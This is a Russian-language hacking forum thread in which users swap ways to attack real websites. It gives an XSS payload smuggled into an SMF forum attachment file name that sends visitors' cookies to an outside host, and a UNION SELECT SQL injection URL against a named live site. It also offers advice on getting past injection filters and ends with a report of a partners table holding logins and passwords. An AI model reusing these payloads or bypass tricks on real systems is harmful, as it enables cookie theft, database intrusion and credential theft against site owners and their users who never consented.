Всё прально, вместо цифр ставь текст : alert(/gagaga/) или alert(135) Про XSS тут дофига статей, пофтыкай побольше.Если те нужен перевод, пиши на 292-514-125 : )
Ой мля,ступил ппц.Это атака через хттр заголовок Expect.Для этого надо создать объект и послать,лично не пробывал:Р.Прост этот торч надеется на то, что через ие и файрфокс так сделать нельзя(и правильно делает),но через объекты мона.
Послушай, юноша, за каким хреном писать такой бред? vampir3a Вот немного об уязвимости на русском, но не особо обольщайся, сканер нашёл это не значит ,что получится использовать _http://www.securitylab.ru/analytics/271169.php
1.Есть форум, Powered by SMF 1.1.x,как узнать х? 2.Надеясь на удачу(что версия <=1.1.4), пробую приаттачить файл со следующим названием: Code: abc<img src= .width=1 height=1 onerror=javascriptnew Image().src='http//s.netsec.ru/arm.gif'+document.cookie>.txt Но выдаётся ошибка: Code: default.htm. Вы не можете отправить этот файл. Доступны только следующие типы файлов doc,gif,jpg,mpg,pdf,png,txt,zip.
Подскажите это уязвимость или нет? помоему да, т.к при таком запросе не происходит редирект на главную страницу. Но ни одно из полей не выводится --------------------------------------- Извиняюсь сплоховал, менял значения в partner Спасибо ZAMUT!!!
или http://www.intone.ru/get2.php?partner=269&id=89596/**/and/**/1=0/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29/*
Вывод то есть, а каким образом вывести что нибудь интересное? ведь доступа к information_schema нету, и намека, хоть на какое-то название таблиц тоже. Довольно интересный случай (я только учусь и такого еще не встречал).
Там походу фильтры Get-post переменных стоят, ибо как что нормальное в инъекцию прописываешь аля Information_schema.tables, то выдаёт такую байду: "Ваш запрос отвергнут по причине его возможной небезопасности". Хотя классический Union+select даёт вывод в страницу...
попробуй закодировать в %20%40%xx у меня раз был случай когда так прокатывало, а чистый запрос отвергало.
Чойто за 20 40 :РР. Я где-то читал,что мона попробывать передать гет переменные постом и наоборот:Р. Вродь катит.. )А ф топку такие замуты )
Всем конечно спасибо за то что откликнулись, но url encoding не катит. У меня не получилось обойти-может что то посоветуешь? ----------------------------------------------------------- Возможно ли вытащить что-то интересное? если не возможно, так и скажите, чтобы я голову зря не ламал
На первый взгляд ничего интересного. Таблицы clocks,blogtext, blogsfree,freemp3,freepics Есть таблица jgamesru_int.partners с полями name,login,pass